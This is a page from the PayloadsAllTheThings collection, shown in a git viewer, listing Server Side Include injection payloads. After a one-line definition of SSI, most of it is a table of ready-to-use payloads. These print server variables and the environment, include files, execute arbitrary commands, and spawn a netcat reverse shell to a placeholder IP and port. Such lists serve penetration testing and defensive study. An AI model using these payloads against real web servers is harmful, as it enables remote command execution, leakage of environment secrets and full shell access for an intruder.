PayloadsAllTheThings/Server Side Include Injection/README.md

25 lines
1.0 KiB
Markdown
Raw Normal View History

2023-07-08 08:09:59 +00:00
# Server Side Include Injection
> Server Side Includes (SSI) are directives that are placed in HTML pages and evaluated on the server while the pages are being served. They let you add dynamically generated content to an existing HTML page, without having to serve the entire page via a CGI program, or other dynamic technology.
## Summary
* [Payloads](#payloads)
* [References](#references)
## Payloads
| Description | Payload |
|-------------------------|---------|
| Print a date | `<!--#echo var="DATE_LOCAL" -->` |
| Print all the variables | `<!--#printenv -->` |
| Include a file | `<!--#include file="includefile.html" -->` |
| Execute commands | `<!--#exec cmd="ls" -->` |
| Doing a reverse shell | `<!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->` |
## References
2024-11-07 17:31:21 +00:00
* [Server-Side Includes (SSI) Injection - Weilin Zhong, Nsrav - December 4, 2019](https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection)